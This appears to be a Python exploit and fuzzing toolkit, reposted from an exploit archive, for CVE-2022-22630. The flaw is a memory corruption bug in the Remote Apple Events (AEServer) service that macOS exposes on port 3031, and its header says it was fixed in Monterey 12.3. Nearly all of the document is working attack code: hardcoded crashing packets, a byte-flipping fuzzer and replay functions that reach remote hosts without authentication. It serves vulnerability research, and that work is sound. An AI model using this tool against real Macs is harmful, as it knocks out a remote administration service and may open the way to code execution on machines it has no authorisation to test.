Share
## https://sploitus.com/exploit?id=PACKETSTORM:168247
#!/usr/bin/env python  
# -*- coding: UTF-8 -*-  
#  
# naval.py  
#  
# Apple macOS Remote Events Remote Memory Corruption Vulnerability  
#  
# Jeremy Brown [jbrown3264/gmail]  
#  
# =====  
# Intro  
# =====  
#  
# [eppc] Hello from AEServer  
#  
# Remote Apple Events is a core service and remote system administration and automation  
# tool for Macs. It can be enabled via System Preferences -> Sharing and listens on  
# port tcp/3031 and may be used in enterprise environments for remote administration.  
# Sending malformed packets triggers a crash in the AEServer binary which may allow for  
# arbitrary code execution on the remote machine within the context of the _eppc user.  
# However, the crash is subtle as the service is automatically restarted and only a log  
# in /Library/Logs/DiagnosticReports/AEServer_*.crash is generated if ReportCrash is enabled.  
#  
# Although a controlled, reliable crash at an arbitrary location is difficult, it was  
# eventually achieved during testing with repeated characters in packets during sessions.  
#  
# Thread 0 crashed with X86 Thread State (64-bit):  
# rax: 0x4242424242424242 rbx: 0x0000000000000006 rcx: 0x0000424242424240 rdx: 0x00000000000e6370  
# rdi: 0x00007fb041c0ab40 rsi: 0x0000000103d3ba00 rbp: 0x00007ffeebef99f0 rsp: 0x00007ffeebef99b8  
# r8: 0x0000000000000020 r9: 0x0000000000000002 r10: 0x00007fb041c00000 r11: 0x00007fb041c0e1c0  
# r12: 0x000000000000000d r13: 0x00007fff8091afe0 r14: 0x00007fb041c251b0 r15: 0x00007fb041c25218  
# rip: 0x00007fff202d541f rfl: 0x0000000000010202 cr2: 0x0000424242424260  
#  
# While debugging it looks like the process is crashing when trying to release or  
# dereference memory that has been deallocated, likely a sign of a heap related bug  
# such as a use-after-free bug.  
#  
# This code serves as a toolkit to help debug and trigger crashes, but as mentioned  
# extensive testing was required to gain more precise control of rax/rcx. Also note  
# that authentication is not required to trigger crashes service locally or remotely.  
#  
# =======  
# Details  
# =======  
#  
# Much of the functionality depends on running this locally on the target box, such  
# as debugging with ReportCrash logs, but it can certainly trigger remote crashes too  
# if you pass the --remote flag (disables local debugging stuff).  
#  
# $ ./naval.py 10.0.0.12 --fuzz // use --original to fuzz with the non-crashing packets  
# ....  
#  
# $ head crashes.txt  
# 1 - (0x7e @ 1) -> 0x20  
# [many more truncated]  
#  
# $ ./naval.py 10.0.0.12 --sleep --replay "1:7e:1" // pkt:byte:index  
# ....  
#  
# Then within 10 seconds, start the debugger on the local target.. GOGOGO  
#  
# $ sudo lldb -o "attach --name AEServer" -o c  
# ....  
#  
# (lldb) c  
# Process 50050 resuming  
# Process 50050 stopped  
# * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fd1d0e1bd8)  
# frame #0: 0x00007fff2028341f libobjc.A.dylib`objc_release + 31  
#  
# And now you can explore the crash  
#  
# One can also check to see AEServer receving packets:  
# > dtrace -n 'syscall::*recv*:entry { printf("-> %s (pid=%d)", execname, pid); }' | grep AEServer  
#  
# ===  
# Fix  
# ===  
# - Addressed in Monterey 12.3  
#  
# CVE-2022-22630  
#  
  
import os  
import sys  
import argparse  
import datetime  
import time  
import psutil  
import shutil  
import signal  
import socket  
import random  
import re  
  
REPORT_DIR = '/Library/Logs/DiagnosticReports'  
LOG_DIR = 'logs'  
  
PORT = 3031 # eppc  
  
CRASH_LOG = 'crashes' + str(datetime.datetime.now().strftime("%Y%m%d_%H%M%S")) + '.txt'  
REPORT_CRASH = True  
SLEEP_TIME = 10  
MAX_BYTE = 255 # 0xff  
  
#  
# original packets  
#  
PKT_1_ORIG = b'PPCT\x00\x00\x00\x01\x00\x00\x00\x01'  
PKT_2_ORIG = b'\xe4LPRT\x01\xe1\x01\xe7\x06finder\xdf\xdb\xe3\x02\x01=\xdf\xdf\xdf\xdf\xd5\x00'  
PKT_3_ORIG = b'\xe4SREQ\xdf\xdf\xdf\xdf\xdf\x01\xe7\x06finder\xdf\xdb\xe5\x04B{\xbf\xac\xdf\xdf\xdf\xdf\xdf\xdf\xdf\xdf\xdc\xe5\x04test\xdf\xdd\x00'  
PKT_4_ORIG = b'\x16\x03\x01\x00\x92\x01\x00\x00\x8e\x03\x03\x61\x00\x8b\x66\x96\xc7\x08\xa2\xe8\x0e\x53\x13\xbd\xd3\x1c\x69\x12\x43\xd3\x03\xe2\xec\x8d\x61\x3d\x01\xed\x67\xd7\x62\xf8\xca\x00\x00\x2c\x00\xff\xc0\x2c\xc0\x2b\xc0\x24\xc0\x23\xc0\x0a\xc0\x09\xc0\x08\xc0\x30\xc0\x2f\xc0\x28\xc0\x27\xc0\x14\xc0\x13\xc0\x12\x00\x9d\x00\x9c\x00\x3d\x00\x3c\x00\x35\x00\x2f\x00\x0a\x01\x00\x00\x39\x00\x0a\x00\x08\x00\x06\x00\x17\x00\x18\x00\x19\x00\x0b\x00\x02\x01\x00\x00\x0d\x00\x12\x00\x10\x04\x01\x02\x01\x05\x01\x06\x01\x04\x03\x02\x03\x05\x03\x06\x03\x00\x05\x00\x05\x01\x00\x00\x00\x00\x00\x12\x00\x00\x00\x17\x00\x00'  
PKT_5_ORIG = b'\x16\x03\x03\x00\x46\x10\x00\x00\x42\x41\x04\x8d\xd9\xbc\x5f\x9b\x0d\x86\x28\xda\x1f\xba\x75\xe3\x01\x06\x73\xf4\x28\xe2\xe5\x9b\x2e\xfc\x75\x0c\xad\x3d\x7d\xc8\x59\xc0\x20\xce\xcb\xdf\x87\x88\x09\x46\x1f\xf3\x97\x3f\xb8\xd1\xc8\xf5\x4b\xa9\x9f\xdc\xae\xba\x75\x50\xfa\x96\xd5\xcf\xa2\xa4\xec\x7b\x61'  
  
#  
# crashing packets  
#  
PKT_1 = b'PPCT\x00\x00\x00\x01\x00\x00\x00\x01'  
PKT_2 = b'\xe4LPRT\x01\xe1\x01\xe7\x06xxxyyy\xdf\xdb\xe3\x02\x01=\xdf\xdf\xdf\xdf\xd5\x00' # s/finder/xxxyyy  
  
class Naval(object):  
def __init__(self, args):  
self.host = args.host  
self.fuzz = args.fuzz  
self.replay = args.replay  
self.remote = args.remote  
self.reprofile = args.reprofile  
self.original = args.original  
self.sleep = args.sleep  
  
self.pkt1 = None  
self.pkt2 = None  
  
# original  
self.pkt3 = None  
self.pkt4 = None  
self.pkt5 = None  
  
self.pkt_pick = 0  
  
self.pkt_num = None  
self.byte = None  
self.index = None  
  
self.logs = []  
  
def run(self):  
if(self.remote):  
REPORT_CRASH = False  
else:  
REPORT_CRASH = True  
  
if(REPORT_CRASH):  
#  
# sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist  
#  
if('ReportCrash' not in (proc.name() for proc in psutil.process_iter())):  
print("ReportCrash isn't running, make sure it's enabled first\n")  
return -1  
  
if(os.path.isdir(REPORT_DIR)):  
try:  
logs = os.listdir(REPORT_DIR)  
except Exception as error:  
print("failed to list %s: %s\n" % (REPORT_DIR, error))  
return -1  
else:  
print("dir %s doesn't exist, can't fuzz and check for crashes\n" % REPORT_DIR)  
return -1  
  
if(self.original):  
# non-crashing  
self.pkt1 = PKT_1_ORIG  
self.pkt2 = PKT_2_ORIG  
self.pkt3 = PKT_3_ORIG  
self.pkt4 = PKT_4_ORIG  
self.pkt5 = PKT_5_ORIG  
else:  
# crashing  
self.pkt1 = PKT_1  
self.pkt2 = PKT_2  
  
if(self.replay):  
if(len(self.replay.split(':')) != 3):  
print("invalid replay format: %s" % self.replay)  
return -1  
  
replay = self.replay.split(':')  
  
try:  
self.pkt_num = int(replay[0])  
except Exception as error:  
print("packet number %s is invalid: %s", (pkt_num, error))  
return -1  
  
try:  
self.byte = int(replay[1], 16)  
except Exception as error:  
print("byte %s is invalid: %s", (byte, error))  
return -1  
  
try:  
self.index = int(replay[2])  
except Exception as error:  
print("index %s is invalid: %s", (index, error))  
return -1  
  
if(self.pkt_num == 1):  
pkt = self.modifyPacket(self.pkt1, self.byte, self.index)  
  
if(pkt == None):  
return -1  
elif(self.pkt_num == 2):  
pkt = self.modifyPacket(self.pkt2, self.byte, self.index)  
  
if(pkt == None):  
return -1  
else:  
print("pkt number must be 1 or 2")  
return -1  
  
print("replaying packets\n")  
  
self.showRepro(pkt)  
  
if(self.reprofile):  
if(self.repro(self.reprofile) < 0):  
print("failed")  
return -1  
  
return 0  
  
#  
# fuzz each packet one after another  
#  
if(self.fuzz):  
print("fuzzing sequentially packet 1\n")  
  
self.pkt_num = 1  
  
if(self.fuzzPacketSeq(self.pkt1) < 0):  
print("failed")  
return -1  
  
print("fuzzing sequentially packet 2\n")  
  
self.pkt_num = 2  
  
if(self.fuzzPacketSeq(self.pkt2) < 0):  
print("failed")  
return -1  
  
if(self.original):  
self.pkt_num = 3  
  
if(self.fuzzPacketSeq(self.pkt3) < 0):  
print("failed")  
return -1  
  
self.pkt_num = 4  
  
if(self.fuzzPacketSeq(self.pkt4) < 0):  
print("failed")  
return -1  
  
self.pkt_num = 5  
  
if(self.fuzzPacketSeq(self.pkt5) < 0):  
print("failed")  
return -1  
else:  
if(not self.replay):  
if(self.original):  
print("sending original packets for testing\n")  
else:  
print("sending packets to trigger crash\n")  
  
self.showRepro([])  
  
sock = self.getSock()  
  
if(sock == None):  
return -1  
  
try:  
sock.connect((self.host, PORT))  
except Exception as error:  
print("connect() failed: %s\n" % error)  
return -1  
  
if(self.sleep):  
time.sleep(SLEEP_TIME)  
  
try:  
sock.send(self.pkt1)  
sock.recv(256)  
except Exception as error:  
print("failed to send/recv packet 1: %s\n" % error)  
return -1  
  
try:  
sock.send(self.pkt2)  
except Exception as error:  
print("failed to send packet 2: %s\n" % error)  
return -1  
  
if(self.original):  
try:  
sock.send(PKT_3_ORIG)  
except Exception as error:  
print("failed to send packet 3: %s\n" % error)  
return -1  
  
try:  
sock.send(PKT_4_ORIG)  
except Exception as error:  
print("failed to send packet 4: %s\n" % error)  
return -1  
  
try:  
sock.send(PKT_5_ORIG)  
except Exception as error:  
print("failed to send packet 5: %s\n" % error)  
return -1  
  
sock.close()  
  
if(REPORT_CRASH):  
self.checkReports()  
  
print("done\n")  
  
return 0  
  
def getSock(self):  
try:  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.settimeout(1)  
except Exception as error:  
print("socket() failed: %s\n" % error)  
return None  
  
return sock  
  
def fuzzPacketSeq(self, packet):  
c = 0  
i = 0  
  
#  
# flip each byte in the packet sequentially from 0 ... 255  
#  
while(i < len(packet)):  
while(c <= MAX_BYTE):  
pkt = bytearray(packet)  
  
self.index = i  
self.byte = c  
  
orig = pkt[self.index]  
pkt[self.index] = self.byte  
  
print("pkt @ index=%d (%s -> %s)" % (self.index, hex(orig), hex(pkt[self.index])))  
  
sock = self.getSock()  
  
if(sock == None):  
return -1  
  
try:  
sock.connect((self.host, PORT))  
except Exception as error:  
print("connect() failed: %s\n" % error)  
continue  
  
if(self.sendPacket(sock, pkt) < 0):  
print("sendPacket() failed\n")  
return -1  
  
sock.close()  
  
self.showRepro(pkt)  
  
if(REPORT_CRASH):  
self.checkReports()  
  
c += 1  
  
c = 0  
i += 1  
  
return 0  
  
def createPacket(self, pkt_name):  
n = random.randint(8,4096)  
  
print("created \\x42 x %d for %s\n" % (n, pkt_name))  
  
return str.encode('B' * n)  
  
def modifyPacket(self, pkt, byte, index):  
if((index < 0) or (index >= len(pkt))):  
print("index must be 0 - %d\n" % (len(pkt)-1))  
return -1  
  
pkt = pkt[:index] + bytes([byte]) + pkt[index + 1:]  
  
return pkt  
  
def sendPacket(self, sock, pkt):  
try:  
if(self.pkt_pick == 1):  
sock.send(pkt)  
else:  
sock.send(self.pkt1)  
  
sock.recv(256)  
except socket.timeout:  
print("timed out")  
except Exception as error:  
print("send/recv failed for packet #1: %s\n" % error)  
  
try:  
if(self.pkt_pick == 2):  
sock.send(pkt)  
else:  
sock.send(self.pkt2)  
  
if(self.original):  
sock.recv(256) # not necessary for crashing packets 1 & 2  
except Exception as error:  
print("send/recv failed for packet #2: %s\n" % error)  
  
if(self.original):  
try:  
if(self.pkt_pick == 3):  
sock.send(pkt)  
else:  
pick = random.randint(1,2)  
  
#  
# pick=1 means self.pkt3 doesn't change  
#  
  
if(pick == 2):  
self.pkt3 = self.createPacket('pkt3')  
  
sock.send(self.pkt3)  
  
sock.recv(256)  
except Exception as error:  
print("send/recv failed for packet #3: %s\n" % error)  
  
try:  
if(self.pkt_pick == 4):  
sock.send(pkt)  
else:  
pick = random.randint(1,2)  
  
if(pick == 2):  
self.pkt4 = self.createPacket('pkt4')  
  
sock.send(self.pkt4)  
  
sock.recv(256)  
except Exception as error:  
print("send/recv failed for packet #4: %s\n" % error)  
  
try:  
if(self.pkt_pick == 5):  
sock.send(pkt)  
else:  
pick = random.randint(1,2)  
  
if(pick == 2):  
self.pkt5 = self.createPacket('pkt5')  
  
sock.send(self.pkt5)  
  
sock.recv(256)  
except Exception as error:  
print("send/recv failed for packet #5: %s\n" % error)  
  
return 0  
  
def repro(self, filename):  
print("reproing crash with %s\n" % os.path.basename(filename))  
  
try:  
with open(filename, 'r') as file:  
data = file.readlines()  
except Exception as error:  
print("failed to read file %s: %s" % (filename, error))  
return -1  
  
try:  
self.pkt1 = bytes.fromhex(data[0].replace('\\x', ''))  
self.pkt2 = bytes.fromhex(data[1].replace('\\x', ''))  
  
if(self.original):  
self.pkt3 = bytes.fromhex(data[2].replace('\\x', ''))  
self.pkt4 = bytes.fromhex(data[3].replace('\\x', ''))  
self.pkt5 = bytes.fromhex(data[4].replace('\\x', ''))  
except Exception as error:  
print("failed to parse repro: %s" % error)  
return -1  
  
sock = self.getSock()  
  
if(sock == None):  
return -1  
  
try:  
sock.connect((self.host, PORT))  
except Exception as error:  
print("connect() failed: %s\n" % error)  
return -1  
  
if(self.sleep):  
time.sleep(SLEEP_TIME)  
  
try:  
sock.send(self.pkt1)  
sock.recv(256)  
except socket.timeout:  
print("timed out")  
except Exception as error:  
print("send/recv failed for packet #1: %s\n" % error)  
  
try:  
sock.send(self.pkt2)  
  
if(self.original):  
sock.recv(256) # not necessary for crashing packets 1 & 2  
except Exception as error:  
print("send/recv failed for packet #2: %s\n" % error)  
  
if(self.original):  
try:  
sock.send(self.pkt3)  
sock.recv(256)  
except Exception as error:  
print("send/recv failed for packet #3: %s\n" % error)  
  
try:  
sock.send(self.pkt4)  
sock.recv(256)  
except Exception as error:  
print("send/recv failed for packet #4: %s\n" % error)  
  
try:  
sock.send(self.pkt5)  
sock.recv(256)  
except Exception as error:  
print("send/recv failed for packet #5: %s\n" % error)  
  
sock.close()  
  
self.showRepro([])  
  
if(REPORT_CRASH):  
self.checkReports()  
  
print("done\n")  
  
return 0  
  
def getHex(self, data):  
return ''.join(f'\\x{byte:02x}' for byte in data)  
  
def printHex(self, data):  
print(''.join(f'\\x{byte:02x}' for byte in data))  
  
def showRepro(self, pkt):  
if(len(pkt) == len(self.pkt1)):  
self.printHex(pkt)  
else:  
self.printHex(self.pkt1)  
  
if(len(pkt) == len(self.pkt2)):  
self.printHex(pkt)  
else:  
self.printHex(self.pkt2)  
  
if(self.original):  
if(len(pkt) == len(self.pkt3)):  
self.printHex(pkt)  
else:  
self.printHex(self.pkt3)  
  
if(len(pkt) == len(self.pkt4)):  
self.printHex(pkt)  
else:  
self.printHex(self.pkt4)  
  
if(len(pkt) == len(self.pkt5)):  
self.printHex(pkt)  
else:  
self.printHex(self.pkt5)  
  
print()  
  
#  
# restore original packets  
#  
self.pkt3 = PKT_3_ORIG  
self.pkt4 = PKT_4_ORIG  
self.pkt5 = PKT_5_ORIG  
  
def checkReports(self):  
time.sleep(2) # make sure ReportCrash has time to do its thing  
  
try:  
logs_now = os.listdir(REPORT_DIR)  
except Exception as error:  
print("failed to open %s for reading: %s\n" % (REPORT_DIR, error))  
return -1  
  
if(len(logs_now) > len(self.logs)):  
logs_new = list(set(logs_now) - set(self.logs))  
  
#  
# if we have new crash logs, grab the pc and correlate it with repro  
#  
for log in logs_new:  
if(log.startswith('AEServer') and log.endswith('.crash')):  
log_file = REPORT_DIR + os.sep + log  
  
try:  
with open(log_file, 'r') as file:  
data = file.read()  
except Exception as error:  
print("failed to read %s: %s\n" % (log, error))  
return -1  
  
pc = re.search('0x(.*)', data)  
  
if(pc != None):  
pc = '0x' + pc.group(1).lstrip('0')  
else:  
print("couldn't get pc from crash log\n")  
  
print("found crash @ pc=%s\n" % pc)  
  
#  
# create a crash log if we're fuzzing or replaying bytes at indices  
#  
if(self.fuzz):  
crash_info = 'pkt #' + str(self.pkt_num) + ' - (byte=' + hex(self.byte) + ' @ index=' + str(self.index) + ') -> ' + pc + '\n'  
  
try:  
with open(CRASH_LOG, 'a') as file:  
file.write(crash_info)  
except Exception as error:  
print("failed to write %s: %s\n" % (crash_info, error))  
return -1  
  
if(not os.path.isdir(LOG_DIR)):  
try:  
os.mkdir(LOG_DIR)  
except Exception as error:  
print("failed to mkdir %s: %s\n" % (LOG_DIR, error))  
  
log_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + str(self.byte) + '_' + str(self.index) + '_' + pc + '.txt'  
  
#  
# move crash log file  
#  
try:  
shutil.move(log_file, log_name)  
except Exception as error:  
print("failed to move %s: %s\n" % (log_file, error))  
return -1  
  
ips_file = REPORT_DIR + os.sep + log.split('.')[0] + '.ips'  
  
ips_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + str(self.byte) + '_' + str(self.index) + '_' + pc + '.txt'  
  
#  
# check if there's an associated .ips  
#  
if(os.path.isfile(ips_file)):  
try:  
# shutil.move(ips_file, LOG_DIR)  
shutil.move(ips_file, ips_name)  
except Exception as error:  
print("failed to move %s: %s\n" % (ips_file, error))  
return -1  
  
#  
# write repro if random fuzzing (no byte/index to replay)  
#  
# note: possible bug somewhere preventing pkt 3-5 from saving the correct repro,  
# (eg. if mutated with B's), so for now we're just extra verbose with output when  
# mutating packets and stop if pc contains 424242 so we can debug from there  
#  
repro_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + pc + '_' + 'repro' + '.txt'  
  
try:  
with open(repro_name, 'w') as file:  
file.write(self.getHex(self.pkt1))  
file.write('\n')  
file.write(self.getHex(self.pkt2))  
  
if(self.original):  
file.write('\n')  
file.write(self.getHex(self.pkt3))  
file.write('\n')  
file.write(self.getHex(self.pkt4))  
file.write('\n')  
file.write(self.getHex(self.pkt5))  
except Exception as error:  
print("failed to write %s: %s\n" % (repro_name, error))  
return -1  
  
#  
# temporary to help triage crashing packets  
#  
if('424242' in pc):  
self.showRepro([])  
sys.exit(0)  
  
#  
# reset logs after move  
#  
try:  
self.logs = os.listdir(REPORT_DIR)  
except Exception as error:  
print("failed to list %s: %s\n" % (REPORT_DIR, error))  
return -1  
  
return 0  
  
def stop(signum, frame):  
print()  
sys.exit(0)  
  
def arg_parse():  
parser = argparse.ArgumentParser()  
  
parser.add_argument("host",  
type=str,  
help="target listening on eppc port 3031")  
  
parser.add_argument("--fuzz",  
"--fuzz",  
default=False,  
action="store_true",  
help="sequentially exhaust bytes in each packet and display crashing PC as available")  
  
parser.add_argument("--remote",  
"--remote",  
default=False,  
action="store_true",  
help="target remote hosts and turn disable local debugging support")  
  
parser.add_argument("--replay",  
"--replay",  
type=str,  
help="replay crash with the following format [pkt:byte:index], eg. 2:ff:3")  
  
parser.add_argument("--reprofile",  
"--reprofile",  
type=str,  
help="filename containing packet data on each line to replay (generated by random fuzzing)")  
  
parser.add_argument("--original",  
"--original",  
default=False,  
action="store_true",  
help="use the original non-crashing packets")  
  
parser.add_argument("--sleep",  
"--sleep",  
default=False,  
action="store_true",  
help="sleep helper for time to lldb attach after launchd creates the AEServer process upon connection (10 secs)")  
  
args = parser.parse_args()  
  
return args  
  
def main():  
signal.signal(signal.SIGINT, stop)  
  
args = arg_parse()  
  
nr = Naval(args)  
  
result = nr.run()  
  
if(result > 0):  
sys.exit(-1)  
  
if(__name__ == '__main__'):  
main()